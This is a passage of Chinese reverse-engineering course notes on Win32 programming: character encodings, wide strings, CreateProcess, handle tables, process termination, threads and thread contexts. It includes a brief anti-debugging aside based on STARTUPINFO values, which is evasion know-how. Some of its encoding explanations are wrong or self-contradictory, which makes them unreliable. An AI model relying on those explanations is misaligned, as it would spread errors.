其实很简单,Unicode编码创建了一张包含世界上所有文字的编码表,只要世界上存在的文字符号,都会赋予
一个唯一的编码。
Unicode编码的范围是:0x0-0x10FFFF,其可以容纳100多万个符号,但是Unicode本身也存在问题,因为
Unicode只是一个符号集,它只规定了符号的二进制代码,却没有规定这个二进制代码应该如何去存储。
假设中这个字以Unicode方式表示占2个字节,而国这个字却占4个,这个时候你该如何去存储?
2.4 Unicode存储的实现方式
2.4.1 UTF-16
UTF-16/UTF-8是Unicode存储的实现方式;UTF-16编码是以16个无符号整数位单位,注意是16位为一个单位,
但不表示一个字符就只有16位,具体的要看字符的Unicode编码所在范围,有可能是2字节,有可能是4字节,
现在机器上的Unicode编码一般指的就是UTF-16。
滴水逆向课程笔记 – Win32
字符编码 – 4
我们举个例子(虚构):
中(Unicode编码):0x1234
国(Unicode编码):0x12345
UTF-16存储的时候,“中”这个字肯定是存储的0x1234,但是“国”这个字就不一样, 我们知道UTF-16是16位(2
字节)为一个单位,所以国这个字拆下来存储应该是0x00 0x01 0x23 0x45。
UTF-16的优点一看便知:计算、拆分、解析非常方便,2个字节为一个单位,一个一个来。
UTF-16是否是最优解呢?其实不然,我们通过如上的例子中可以看到一个很明显的缺点,那就是UTF-16会存在
浪费空间的情况,因为其16位(2字节)为一个单位,它需要字节对齐,例如字母A只需要一个字节就可以表
示,而使用UTF-16时就会变成2个字节,所以很浪费,而这时候UTF-8横空出世。(UTF-16在本地存储是没有
啥问题的,顶多就是浪费一点硬盘空间,但是如果在网络中传输,那就太过于浪费了)
2.4.2 UTF-8
UTF-8称之为可变长存储方案,其存储根据字符大小来分配,例如字母A就分配一个字节,汉字“中”就分配两个
字节。
优点:节省空间;缺点:解析很麻烦。
UTF-8存储的方式是有对应表的:
例如字母A,在0x000000 - 0x00007F范围之间,则采用0XXXXXX的方式进行存储,也就是按照一个字节的方式来
不会改变什么,而汉字”中“则不一样了。
中(Unicode编码):0x4E 0x2D,它属于0x000800 - 0x00FFFF范围之间。
0x4E 0x2D = 0100 1110 0010 1101,其以UTF-8的方式存储就是1110 (0100) 10(11 1000) 10(10 1101),括号包裹起来
的就是汉字“中”的Unicode编码。
最后一个问题,假设我们把UTF-8的文本格式发给对方,那对方如果按照UTF-16的方式去解析该怎么办?如何
让对方只采用UTF-8的方式去解析呢?
2.5 BOM(Byte Order Mark)
BOM中文为字节顺序标记,其就是用来插入到文本文件起始位置开头的,用于识别Unicode文件的编码类型。
对应关系如下:
滴水逆向课程笔记 – Win32
C语言中的宽字符 – 5
3 C语言中的宽字符
本章主要是讲解在C语言中如何使用上一章所述的编码格式表示字符串。
ASCII码:char strBuff[] = "中国";
Unicode编码(UTF-16):wchar_t strBuff[] = L"中国"; // 这里需要在双引号之前加上L是因为如果你不加的话,
编译器会默认使用当前文件的编码格式去存储,所以我们需要加上。(注意使用这个的时候需要包含stdio.h这
个头文件)
Unicode编码这种表现形式实际上就是宽字符,所以在提起宽字符的时候我们就应该想到这种方式。
ASCII编码和Unicode编码在内存中的存储方式不一样,所以我们使用相关函数的时候也要注意,如下图所示,
ASCII编码使用左边的,而Unicode则是右边的:
滴水逆向课程笔记 – Win32
C语言中的宽字符 – 6
例如我们想要在控制台中打印一个宽字符的字符串:
再一个例子就是字符串的长度:
char strBuff[] = "China";
wchar_t strBuff1[] = L"China";
strlen(strBuff); //取得多字节字符串中字符长度,不包含 00
wcslen(strBuff1); //取得多字节字符串中字符长度,不包含 00 00
滴水逆向课程笔记 – Win32
Win32 API中的宽字符 – 7
1.
2.
3.
4 Win32 API中的宽字符
4.1 了解什么是Win32 API
Win32 API就是Windows操作系统提供给我们的函数(应用程序接口),其主要存放在C:\Windows\System32
(存储的DLL是64位)、C:\Windows\SysWOW64(存储的DLL是32位)下面的所有DLL文件(几千个)。
重要的DLL文件:
Kernel32.dll:最核心的功能模块,例如内存管理、进程线程相关的函数等;
User32.dll:Windows用户界面相关的应用程序接口,例如创建窗口、发送信息等;
GDI32.dll:全称是Graphical Device Interface(图形设备接口),包含用于画图和显示文本的函数。
在C语言中我们想要使用Win32 API的话直接在代码中包含windows.h这个头文件即可。
比如我们想要弹出一个提示窗口,Win32 API文档中弹窗API的格式如下:
这个代码可能看起来非常可怕,好像我们都没有接触过,但实际上其不是什么新的类型,所谓的新的类型无非
就是给原有的类型重新起了一个名字,这样做是为了将所有类型统一化,便于读写,如果涉及到跨平台的话将
原来的类型修改一下就好了,无需对代码进行重写。
例如以上代码中的类型LPCTSTR,实际上我们跟进一下代码(选中F12)会发现其本质就是const char *这个类
型,只不过是换了一个名字罢了。
常用的数据类型在Win32中都重新起了名字:
4.2 在Win32中使用字符串
字符类型:
int MessageBox(
1
HWND hWnd, // handle to owner window
2
LPCTSTR lpText, // text in message box
3
LPCTSTR lpCaption, // message box title
4
UINT uType // message box style
5
);
6
滴水逆向课程笔记 – Win32
Win32 API中的宽字符 – 8
字符串指针:
4.3 使用Win32 API弹框
之前我们了解到Win32 API中的弹框,其名称为MessageBox,其实际上本质就是MessageBoxW和MessageBoxA:
MessageBoxA只接受ASCII编码的参数,而MessageBoxW则只接受Unicode编码的参数。
从本质上来讲,Windows字符串都是宽字符的,所以使用MessageBoxW这种方式性能会更好一些,因为当你使
用MessageBoxA的时候,在到内核的时候(系统底层)其会转化Unicode,所以性能相对差一些。
弹框调用如下:
CHAR strBuff[] = "中国"; // char
WCHAR strBuff[] = L"中国"; // wchar_t
TCHAR strBuff[] = TEXT("中国"); // TCHAR 根据当前项目的编码自动选择char还是wchar_t,在Win32中推
荐使用这种方式
PSTR strPoint = "中国"; // char*
PWSTR strPoint = L"中国"; // wchar_t*
PTSTR strPoint = TEXT("中国"); // PTSTR 根据当前项目的编码自动选择如char*还是wchar_t*,在Win32
中推荐使用这种方式
CHAR strTitle[] = "Title";
1
CHAR strContent[] = "Hello World!";
2
MessageBoxA(0, strContent, strTitle, MB_OK);
3
4
WCHAR strTitle[] = L"Title";
5
WCHAR strContent[] = L"Hello World!";
6
MessageBoxW(0, strContent, strTitle, MB_OK);
7
8
TCHAR strTitle[] = TEXT("Title");
9
TCHAR strContent[] = TEXT("Hello World!");
10
MessageBox(0, strContent, strTitle, MB_OK);
11
滴水逆向课程笔记 – Win32
Win32 API中的宽字符 – 9
滴水逆向课程笔记 – Win32
进程的创建过程 – 10
1.
2.
3.
4.
5.
a.
b.
5 进程的创建过程
5.1 什么是进程
程序所需要的资源(数据、代码...)是由进程提供的;进程是一种空间上的概念,它的责任就是提供资源,至
于资源如何使用,与它无关。
每一个进程都有自己的一个4GB大小的虚拟空间,也就是从0x0-0xFFFFFFFF这个范围。
进程内存空间的地址划分如下,每个进程的内核是同一份(高2G),只有其他三个分区是进程独有的(低
2G),而只有用户模式区是我们使用的范围:
进程也可以理解为是一对模块组成的,我们可以使用OD打开一个进程看一下:
这里面有很多的模块,每个模块都是一个可执行文件,它们遵守相同的格式,即PE结构,所以我们也可以理解
进程就是一堆PE组合。
5.2 进程的创建
我们需要知道任何进程都是别的进程创建的,当我们在Windows下双击打开一个文件,实际上就是explore.exe
这个进程创建的我们打开文件的进程,其使用的方法就是:CreateProcess()
进程创建的过程也就是CreateProcess函数:
映射EXE文件(低2G)
创建内核对象EPROCESS(高2G)
映射系统DLL(ntdll.dll)
创建线程内核对象RTHREAD(高2G)
系统启动线程:
映射DLL(ntdll.LdrInitializeThunk)
线程开始执行
滴水逆向课程笔记 – Win32
进程的创建过程 – 11
如上图就是打开A.exe的创建过程图,进程是空间上的概念,只用于提供代码和数据资源等等...而想要使用这些
资源的是线程,每个进程至少需要一个线程。
滴水逆向课程笔记 – Win32
创建进程 – 12
6 创建进程
创建进程的函数是CreateProcess(),这个函数的使用方法如下:
本章节对CreateProcess函数的了解就是前2个参数和后2个参数,前两个参数:lpApplicationName、
lpCommandLine,第一个是需要启动的进程文件路径,第二个是命令行参数,如果你启动的进程有参数的可
以可以传入。
命令行参数是指在CMD命令行下运行程序所需要提供的参数,例如我们的main入口函数:
其函数传参char* argv[]就是命令行参数,要使用的话就是argv[0]则表示程序本身,其余往后则是参数,
argv[1]、argv[2]...等等:
所以我们要使用CreateProcess函数创建进程的话,如果需要提供命令行参数则需要填写第二个参数
lpCommandLine:
BOOL CreateProcess(
1
LPCTSTR lpApplicationName, // name of executable module 进程名(完整文件路径)
2
LPTSTR lpCommandLine, // command line string 命令行传参
3
LPSECURITY_ATTRIBUTES lpProcessAttributes, // SD 进程句柄
4
LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD 线程句柄
5
BOOL bInheritHandles, // handle inheritance option 句柄
6
DWORD dwCreationFlags, // creation flags 标志
7
LPVOID lpEnvironment, // new environment block 父进程环境变量
8
LPCTSTR lpCurrentDirectory, // current directory name 父进程目录作为当前目录,设置目
录
9
LPSTARTUPINFO lpStartupInfo, // startup information 结构体详细信息(启动进程相关信
息)
10
LPPROCESS_INFORMATION lpProcessInformation // process information 结构体详细信息(进程ID、线程ID、
进程句柄、线程句柄)
11
);
12
int main(int argc, char* argv[])
1
{
2
printf("%s - %s", argv[0], argv[1]);
3
return 0;
4
}
5
滴水逆向课程笔记 – Win32
创建进程 – 13
如上图所示代码,首先我定义了进程路径、进程命令行参数,其次创建了si、pi两个结构体,然后使用
ZeroMemory函数用0填充结构体数据,再给si.cb成员赋值当前结构体大小(为什么需要?这是因为Windows会
有很多个版本,便于未来更新换代);最后CreateProcess函数创建进程,由于CreateProcess函数本身返回值
是布尔类型的,所以使用if来判断,如果出问题则使用GetLastError函数来获取问题编号,具体编号对应什么
内容可以参考百度百科:https://baike.baidu.com/item/GetLastError/4278820?fr=aladdin
#include <windows.h>
1
#include <stdlib.h>
2
3
int main(int argc, char* argv[])
4
{
5
TCHAR childProcessName[] = TEXT("C:/WINDOWS/system32/cmd.exe");
6
TCHAR childProcessCommandLine[] = TEXT(" /c ping 127.0.0.1");
7
8
STARTUPINFO si;
9
PROCESS_INFORMATION pi;
10
11
ZeroMemory(&si, sizeof(si));
12
ZeroMemory(&pi, sizeof(pi));
13
14
si.cb = sizeof(si);
15
16
if(CreateProcess(childProcessName, childProcessCommandLine, NULL, NULL, FALSE, 0, NULL, NULL,
&si, &pi)) {
17
printf("CreateProcess Successfully! \n");
18
} else {
19
printf("CreateProcess Error: %d \n", GetLastError());
20
}
21
22
CloseHandle(pi.hProcess);
23
CloseHandle(pi.hThread);
24
25
system("pause");
26
return 0;
27
}
28
滴水逆向课程笔记 – Win32
创建进程 – 14
在创建完进程之后需要关闭进程,但是我们所知道,每个进程至少有一个线程,所以我们也要关闭线程,使用
CloseHandle函数来关闭。
6.1 课外扩展-反调试(STARTUPINFO结构体)
CreateProcess()函数创建进程,其有一个参数是STARTUPINFO结构体,这个参数是进程启动的一些信息,我
们一开始会将其ZeroMemory()函数处理,填充0,那么在运行的时候是否还都是0呢?或者说在载入调试工具的
时候所有成员是否都是0呢?
首先我们来看一下STARTUPINFO结构体的成员:
typedef struct _STARTUPINFOA {
1
DWORD cb;
2
LPSTR lpReserved;
3
LPSTR lpDesktop;
4
LPSTR lpTitle;
5
DWORD dwX;
6
DWORD dwY;
7
DWORD dwXSize;
8
DWORD dwYSize;
9
DWORD dwXCountChars;
10
DWORD dwYCountChars;
11
DWORD dwFillAttribute;
12
DWORD dwFlags;
13
WORD wShowWindow;
14
WORD cbReserved2;
15
LPBYTE lpReserved2;
16
HANDLE hStdInput;
17
HANDLE hStdOutput;
18
HANDLE hStdError;
19
} STARTUPINFOA, *LPSTARTUPINFOA;
20
滴水逆向课程笔记 – Win32
创建进程 – 15
将这几个DWORD类型的成员打印一下看看,通过GetStartupInfo函数来获取信息:
正常打开(P1)和在DTDebug调试工具(P2)中打开:
我们可以很清楚的看见了几个值在调试工具中打开发生变化:si.dwXSize, si.dwYSize, si.dwXCountChars,
si.dwFillAttribute, si.dwFlags
所以我们可以根据这几个值来判断从而进行反调试:
#include "stdafx.h"
1
#include <windows.h>
2
#include <stdlib.h>
3
4
int main(int argc, char* argv[])
5
{
6
STARTUPINFO si;
7
ZeroMemory(&si, sizeof(si));
8
si.cb = sizeof(si);
9
10
GetStartupInfo(&si);
11
12
printf("%d %d %d %d %d %d %d %d\n", si.dwX, si.dwY, si.dwXSize, si.dwYSize, si.dwXCountChars,
si.dwYCountChars, si.dwFillAttribute, si.dwFlags);
13
system("pause");
14
return 0;
15
}
16
滴水逆向课程笔记 – Win32
句柄表 – 16
7 句柄表
在上一章节中,我们了解到了CreateProcess()函数创建进程会有一个结构体LPPROCESS_INFORMATION
lpProcessInformation,这个结构体会有进程和线程的ID、句柄信息,那么什么是ID?什么是句柄?
7.1 内核对象
7.1.1 什么是内核对象
首先我们来了解一下内核对象,以后会经常与内核对象打交道,例如进程、线程、文件、互斥体、事件等等在
内核都有一个对应的结构体,这些结构体都由内核负责管理,所以我们都可以称之为内核对象(当我们创建一
个进程,在内核层(高2G)就会创建一个结构体EPROCESS...)。
记不住没关系,我们可以在MSDN Library中搜索CloseHandle这个函数,它是用来关闭句柄的,暂时先不用管
其原理,我们只要知道它所支持关闭就都是内核对象:
滴水逆向课程笔记 – Win32
句柄表 – 17
7.1.2 管理内核对象
当我们使用如下图所示的函数创建时,会在内核层创建一个结构体,而我们该如何管理这些结构体呢?或者说
如何使用这些结构体呢?其实很好解决,我们可以通过内核结构体地址来管理,但是这样做存在问题:应用层
很有可能操作不当导致修改啦内核结构体的地址,我们写应用层代码都知道访问到一个不存在的内存地址就会
报错,而如果访问到一个内核地址是错误的,微软系统下则直接会蓝屏。
微软为了避免这种情况的发生,所以其不会讲内核结构体的地址暴露给应用层,也就是说没法通过这种方式来
直接管理。
滴水逆向课程笔记 – Win32
句柄表 – 18
7.2 进程句柄表
没法直接管理内核对象,这时候句柄表就诞生了,但是需要注意的是,只有进程才会有句柄表,并且每一个进
程都会有一个句柄表。
句柄本质上就一个防火墙,将应用层、内核层隔离开来,通过句柄就可以控制进程内核结构体,我们得到所谓
句柄的值实际上就是句柄表里的一个索引。
7.3 多进程共享一个内核对象
如下图所示,A进程通过CreateProcess函数创建了一个内核对象;B进程通过OpenProcess函数可以打开别人
创建好的一个进程,也就是可以操作其的内核对象;A进程想要操作内核对象就通过其对应的句柄表的句柄
(索引)来操作;B进程操作这个内核对象也是通过它自己的句柄表的句柄(索引)来操作内核对象。(需要
注意的是:句柄表是一个私有的,句柄值就是进程自己句柄表的索引)
在之前的例子中我们提到了CloseHandle这个函数是用来关闭进程、线程的,其实它的本质就是释放句柄,但
是并不代表执行了这个函数,创建的内核对象就会彻底消失;如上图中所示内核对象存在一个计数器,目前是
2,它的值是根据调用A的次数来决定的,如果我们只是在A进程中执行了CloseHandle函数,内核对象并不会消
失,因为进程B还在使用,而只有进程B也执行了CloseHandle函数,这个内核对象的计数器为0,就会关闭消
失了。
最后:注意,以上所述特性适合于除了线程以外的所有内核对象,创建进程,同时也会创建线程,如果你想把
线程关闭,首先需要CloseHandle函数要让其计数器为0,其次需要有人将其关闭,所以假设我们创建了一个IE
滴水逆向课程笔记 – Win32
句柄表 – 19
进程打开了一个网站,如果我们只是在代码中使用了CloseHandle函数,这样IE浏览器并不会关闭,需要我们
手动点击窗口的关闭按钮才行(只有线程关闭了,进程才会关闭)。
7.4 句柄是否"可以"被继承
除了我们上述的方式可以进行共享内核对象以外,Windows还设计了一种方式来提供我们共享内核对象,我们
先来了解一下句柄是否"可以"被继承。
如下图所示(句柄表是有三列的,分别是句柄值、内核结构体地址、句柄是否可以被继承),比如说我们在A
进程(父进程)创建了4个内核对象:
这四个函数都有一个参数LPSECURITY_ATTRIBUTES lpThreadAttributes,通过这个参数我们可以判断函数是否
创建的是内核对象。
我们可以跟进看一下这个参数,它就是一个结构体:
结构体成员分别是:1.结构体长度;2.安全描述符;3.句柄是否被继承。
第一个成员我们见怪不怪了,在Windows设计下都会有这样一个成员;第二个安全描述符,这个对我们来说实
际上没有任何意义,一般留空就行,默认它会遵循父进程的来,其主要作用就是描述谁创建了该对象,谁有访
问、使用该对象的权限。
第三个成员是我们重点需要关注的,因为其决定了句柄是否可以被继承,如下图所示,我们让CreateProcess函
数创建的进程、线程句柄可以被继承:
滴水逆向课程笔记 – Win32
句柄表 – 20
7.5 句柄是否"允许"被继承
我们可以让句柄被继承,但也仅仅是可以,要真正完成继承,或者说我们允许子进程继承父进程的句柄,这时
候就需要另外一个参数了。
我们还是以CreateProcess函数举例,其有一个参数BOOL bInheritHandles,这个参数决定了是否允许创建的子
进程继承句柄:
只有这个参数设置为TRUE时,我们创建的子进程才允许继承父进程的句柄。
滴水逆向课程笔记 – Win32
进程相关API – 21
8 进程相关API
8.1 ID与句柄
如果我们成功创建了一个进程,CreateProcess函数会给我们返回一个结构体,包含四个数据:进程编号
(ID)、进程句柄、线程编号(ID)、线程句柄。
进程ID其实我们早就见过了,通常我们称之为PID,在任务管理器的进程栏下就可以很清楚的看见:
每个进程都有一份私有的句柄表,而操作系统也有一份句柄表,我们称之为全局句柄表,这张表里包含了所有
正在运行的进程、线程:
PID我们就可以理解为是全局句柄表中的一个索引,那么PID和句柄的区别就很容易看出来来了,PID是全局
的,在任何进程中都有意义,都可以使用,而句柄则是局部的、私有的;PID是唯一的,绝对不可能出现重复
的存在,但是当进程消失,那么这个PID就有可能会分给另外一个进程。(PID不是句柄,但是可以通过PID获
得到全局句柄表中其对应的句柄)
8.2 TerminateProcess函数
我们可以来论证一下如上所述的概念,首先A进程打开IE浏览器,然后获取进程ID和句柄:
滴水逆向课程笔记 – Win32
进程相关API – 22
其次B进程使用TerminateProcess函数来终止A进程,首先使用句柄信息终止:
// TerminateProcess函数
1
BOOL TerminateProcess(
2
HANDLE hProcess, // handle to the process 句柄
3
UINT uExitCode // exit code for the process 退出代码
4
);
5
滴水逆向课程笔记 – Win32
进程相关API – 23
TerminateProcess函数是用来终止进程的,具体的可以参考MSDN Library,在这里我们很清楚的可以看见终止
进程失败了,这个错误编号的意思就是句柄无效,那么就论证了句柄是私有的,其他进程无法根据这个句柄来
终止进程,但是我们想要真正的关闭这个进程,那就需要借助PID来获取句柄了,具体细节如下。
8.3 OpenProcess函数
了解了TerminateProcess函数后,我们想要真正的去关闭一个进程,需要借助OpenProcess函数,这个函数是用
来打开进程对象的:
HANDLE OpenProcess(
1
DWORD dwDesiredAccess, // access flag 你希望的访问权限
2
BOOL bInheritHandle, // handle inheritance option 是否可以被继承
3
DWORD dwProcessId // process identifier 进程ID
4
);
5
滴水逆向课程笔记 – Win32
进程相关API – 24
如下代码所示,我通过PID打开进程(OpenProcess函数),拥有所有权,不继承句柄表,当OpenProcess函数
执行完成之后,我就获得一个句柄,通过这个句柄我就可以终止进程:
8.4 以挂起的形式创建进程
CreateProcess函数的所有参数都需要了解一下,现在我们来看一下第六个参数DWORD dwCreationFlags:
HANDLE hProcess;
1
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 0x524);
2
3
if(!TerminateProcess(hProcess, 0)) {
4
printf("终止进程失败:%d \n", GetLastError());
5
}
6
滴水逆向课程笔记 – Win32
进程相关API – 25
当我们创建一个控制台进程时,会发现子进程和父进程都在同一个命令行控制台中:
而如果我们想要区分的话就需要借助dwCreationFlags这个参数,将其修改为CREATE_NEW_CONSOLE即可:
BOOL CreateProcess(
1
LPCTSTR lpApplicationName, // name of executable module
2
LPTSTR lpCommandLine, // command line string
3
LPSECURITY_ATTRIBUTES lpProcessAttributes, // SD
4
LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD
5
BOOL bInheritHandles, // handle inheritance option
6
DWORD dwCreationFlags, // creation flags <--这个参数
7
LPVOID lpEnvironment, // new environment block
8
LPCTSTR lpCurrentDirectory, // current directory name
9
LPSTARTUPINFO lpStartupInfo, // startup information
10
LPPROCESS_INFORMATION lpProcessInformation // process information
11
);
12
滴水逆向课程笔记 – Win32
进程相关API – 26
但是这个并不是我们最重要的,或者说不是其真正有意义的参数,有意义的是参数值为CREATE_SUSPENDED
,也就是以挂起的形式创建进程。
而如果是以挂起的方式创建进程,那么进程的创建过程就会发生变化:
滴水逆向课程笔记 – Win32
进程相关API – 27
那也就说明了一点,挂起本质上挂起的是线程,进程还是会创建的,所以,最终如果想恢复的话也是恢复线
程:
滴水逆向课程笔记 – Win32
进程相关API – 28
8.5 模块目录与工作目录
通过GetModuleFileName和GetCurrentDirectory函数可以分别获得当前模块目录和当前工作目录:
需要注意的是工作目录是可以修改的,我们可以通过CreateProcess函数来创建一个进程,并且修改其工作目
录,这是CreateProcess函数的第八个参数LPCTSTR lpCurrentDirectory。
假设我们有这样一个需求:打开当前工作目录下的1.txt文件:
而这时候我们可以通过CreateProcess函数修改工作路径,让其读取我们指定工作目录的文件:
char strModule[256];
1
GetModuleFileName(NULL,strModule, 256); // 得到当前模块目录,当前exe所在的路径,包含exe文件名
2
3
char strWork[1000];
4
GetCurrentDirectory(1000, strWork); // 获取当前工作目录
5
6
printf("模块目录:%s \n工作目录:%s \n", strModule, strWork);
7
滴水逆向课程笔记 – Win32
进程相关API – 29
8.6 其他进程相关API
获取当前进程ID(PID):GetCurrentProcessId
获取当前进程句柄:GetCurrentProcess
获取命令行:GetCommandLine
获取启动信息:GetStartupInfo
遍历进程ID:EnumProcesses
快照:CreateToolhelp32Snapshot
滴水逆向课程笔记 – Win32
创建线程 – 30
1.
2.
9 创建线程
9.1 什么是线程
线程是附属在进程上的执行实体,是代码的执行流程;
一个进程可以包含多个线程(一个进程至少要包含一个线程,进程是空间上的概念,线程是时间上的概
念)。
通过Windows任务管理器我们也可以很清晰的看见每个进程当前的线程数量:
有几个线程就表示着有几个代码在执行,但是它们并不一定是同时执行,例如单核的CPU情况下是不存在多线
程的,线程的执行是有时间顺序的,但是CPU切换的非常快,所以给我们的感觉和多核CPU没什么区别。
9.2 创建线程
创建线程使用CreateThread函数,其语法格式如下:
线程执行函数的语法要求如下:
HANDLE CreateThread( // 返回值是线程句柄
1
LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD 安全属性,包含安全描述符
2
SIZE_T dwStackSize, // initial stack size 初始堆栈
3
LPTHREAD_START_ROUTINE lpStartAddress, // thread function 线程执行的函数代码
4
LPVOID lpParameter, // thread argument 线程需要的参数
5
DWORD dwCreationFlags, // creation option 标识,也可以以挂起形式创建线程
6
LPDWORD lpThreadId // thread identifier 返回当前线程ID
7
);
8
滴水逆向课程笔记 – Win32
创建线程 – 31
我们尝试创建一个线程执行for循环,如下图:
滴水逆向课程笔记 – Win32
创建线程 – 32
线程间不会相互配合,而是各自执行自己的,如果想要配合就需要了解线程通信,这个后面会学习到。
9.3 向线程函数传递参数
向线程传递参数,如下图所示,我们想要自定义线程执行for循环的次数,将n传递进去,这时候需要注意参数
传递到线程参数时在堆栈中存在,并且传递的时候需要强制转换一下:
#include <windows.h>
1
2
// 线程执行的函数有语法要求,参考MSDN Library
3
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
4
// 要执行的代码
5
for(int i = 0; i < 100; i++) {
6
Sleep(500);
7
printf("++++++ %d \n", i);
8
}
9
10
return 0;
11
}
12
13
int main(int argc, char* argv[])
14
{
15
// 创建线程
16
CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
17
18
// 要执行的代码
19
for(int i = 0; i < 100; i++) {
20
Sleep(500);
21
printf("------ %d \n", i);
22
}
23
return 0;
24
25
}
26
滴水逆向课程笔记 – Win32
创建线程 – 33
为了保证参数的生命周期,我们也可以将参数放在全局变量区:
滴水逆向课程笔记 – Win32
线程控制 – 34
10 线程控制
10.1 让线程停下来
10.1.1 Sleep函数
Sleep函数是让当前执行到本函数时延迟指定的毫秒之后再向下走,例如:
10.1.2 SuspendThread函数
SuspendThread函数用于暂停(挂起)某个线程,当暂停后该线程不会占用CPU,其语法格式很简单,只需要
传入一个线程句柄即可:
10.1.3 ResumeThread函数
ResumeThread函数用于恢复被暂停(挂起)的线程,其语法格式也很简单,只需要传入一个线程句柄即可:
需要注意的是,挂起几次就要恢复几次。
for(int i = 0; i < 100; i++) {
1
Sleep(500);
2
printf("------ %d \n", i);
3
}
4
DWORD SuspendThread(
1
HANDLE hThread // handle to thread
2
);
3
DWORD ResumeThread(
1
HANDLE hThread // handle to thread
2
);
3
SuspendThread(hThread);
1
SuspendThread(hThread);
2
3
ResumeThread(hThread);
4
ResumeThread(hThread);
5
滴水逆向课程笔记 – Win32
线程控制 – 35
10.2 等待线程结束
10.2.1 WaitForSingleObject函数
WaitForSingleObject函数用于等待一个内核对象状态发生变更,那也就是执行结束之后,才会继续向下执行,
其语法格式如下:
如果你想一直等待的话,可以将第二参数的值设置为INFINITE。
10.2.2 WaitForMultipleObjects函数
WaitForMultipleObjects函数与WaitForSingleObject函数作用是一样的,只不过它可以等待多个内核对象的状态
发生变更,其语法格式如下:
DWORD WaitForSingleObject(
1
HANDLE hHandle, // handle to object 句柄
2
DWORD dwMilliseconds // time-out interval 等待超时时间(毫秒)
3
);
4
HANDLE hThread;
1
hThread = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
2
WaitForSingleObject(hThread, INFINITE);
3
printf("OK...");
4
DWORD WaitForMultipleObjects(
1
DWORD nCount, // number of handles in array 内核对象的数量
2
CONST HANDLE *lpHandles, // object-handle array 内核对象的句柄数组
3
BOOL bWaitAll, // wait option 等待模式
4
DWORD dwMilliseconds // time-out interval 等待超时时间(毫秒)
5
);
6
滴水逆向课程笔记 – Win32
线程控制 – 36
等待模式的值是布尔类型,一个是TRUE,一个是FALSE,TRUE就是等待所有对象的所有状态发生变更,FALSE
则是等待任意一个对象的状态发生变更。
10.2.3 GetExitCodeThread函数
线程函数会有一个返回值(DWORD),这个返回值可以根据你的需求进行返回,而我们需要如何获取这个返
回结果呢?这时候就可以使用GetExitCodeThread函数,其语法格式如下:
根据MSDN Library我们可以知道该函数的参数分别是线程句柄,而另一个则是out类型参数,这种类型则可以理
解为GetExitCodeThread函数的返回结果。
HANDLE hThread[2];
1
hThread[0] = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
2
hThread[1] = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
3
WaitForMultipleObjects(2, hThread, TRUE, INFINITE);
4
BOOL GetExitCodeThread(
1
HANDLE hThread, // handle to the thread
2
LPDWORD lpExitCode // termination status
3
);
4
HANDLE hThread;
1
hThread = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
2
3
WaitForSingleObject(hThread, INFINITE);
4
5
DWORD exitCode;
6
GetExitCodeThread(hThread, &exitCode);
7
8
printf("Exit Code: %d \n", exitCode);
9
滴水逆向课程笔记 – Win32
线程控制 – 37
需要注意的是这个函数应该搭配着如上所学的2个等待函数一起使用,不然获取到的值就不会是线程函数返回
的值。
10.3 设置、获取线程上下文
线程上下文是指某一时间点CPU寄存器和程序计数器的内容,如果想要设置、获取线程上下文就需要先将线程
挂起。
10.3.1 GetThreadContext函数
GetThreadContext函数用于获取线程上下文,其语法格式如下:
BOOL GetThreadContext(
1
HANDLE hThread, // handle to thread with context 句柄
2
LPCONTEXT lpContext // context structure
3
);
4
滴水逆向课程笔记 – Win32
线程控制 – 38
第一个参数就是线程句柄,这个很好理解,重点是第二个参数,其是一个CONTEXT结构体,该结构体包含指定
线程的上下文,其ContextFlags成员的值指定了要设置线程上下文的哪些部分。
当我们将CONTEXT结构体的ContextFlags成员的值设置为CONTEXT_INTEGER时则可以获取edi、esi、ebx、edx、
ecx、eax这些寄存器的值:
如下代码尝试获取:
HANDLE hThread;
1
hThread = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
2
3
SuspendThread(hThread);
4
5
CONTEXT c;
6
c.ContextFlags = CONTEXT_INTEGER;
7
GetThreadContext(hThread, &c);
8
9
printf("%x %x \n", c.Eax, c.Ecx);
10
滴水逆向课程笔记 – Win32
线程控制 – 39
10.3.2 SetThreadContext函数
GetThreadContext函数是个设置修改线程上下文,其语法格式如下:
我们可以尝试修改Eax,然后再获取:
BOOL SetThreadContext(
1
HANDLE hThread, // handle to thread
2
CONST CONTEXT *lpContext // context structure
3
);
4
滴水逆向课程笔记 – Win32
线程控制 – 40
HANDLE hThread;
1
hThread = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
2
3
SuspendThread(hThread);
4
5
CONTEXT c;
6
c.ContextFlags = CONTEXT_INTEGER;
7
c.Eax = 0x123;
8
SetThreadContext(hThread, &c);
9
10
CONTEXT c1;
11
c1.ContextFlags = CONTEXT_INTEGER;
12
GetThreadContext(hThread, &c1);
13
14
printf("%x \n", c1.Eax);
15
滴水逆向课程笔记 – Win32
线程控制 – 41
滴水逆向课程笔记 – Win32
临界区 – 42
11 临界区
11.1 线程安全问题
每个线程都有自己的栈,局部变量是存储在栈中的,这就意味着每个进程都会有一份自己的“句柄变
量”(栈),如果线程仅仅使用自己的“局部变量”那就不存在线程安全问题,反之,如果多个线程共用一个全
局变量呢?那么在什么情况下会有问题呢?那就是当多线程共用一个全局变量并对其进行修改时则存在安全问
题,如果仅仅是读的话没有问题。
如下所示代码,我们写了一个线程函数,该函数的作用就是使用全局变量,模拟的功能就是售卖物品,全局变
量countNumber表示该物品的总是,其值是10,而如果有多个地方(线程)去卖(使用)这个物品(全局变
量),则会出现差错:
如图,我们运行了代码,发现会出现重复售卖,并且到最后总数竟变成了-1:
#include <windows.h>
1
2
int countNumber = 10;
3
4
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
5
while (countNumber > 0) {
6
printf("Sell num: %d\n", countNumber);
7
// 售出-1
8
countNumber--;
9
printf("Count: %d\n", countNumber);
10
}
11
return 0;
12
}
13
14
int main(int argc, char* argv[])
15
{
16
HANDLE hThread;
17
hThread = CreateThread(NULL, NULL, ThreadProc, NULL, 0, NULL);
18
19
HANDLE hThread1;
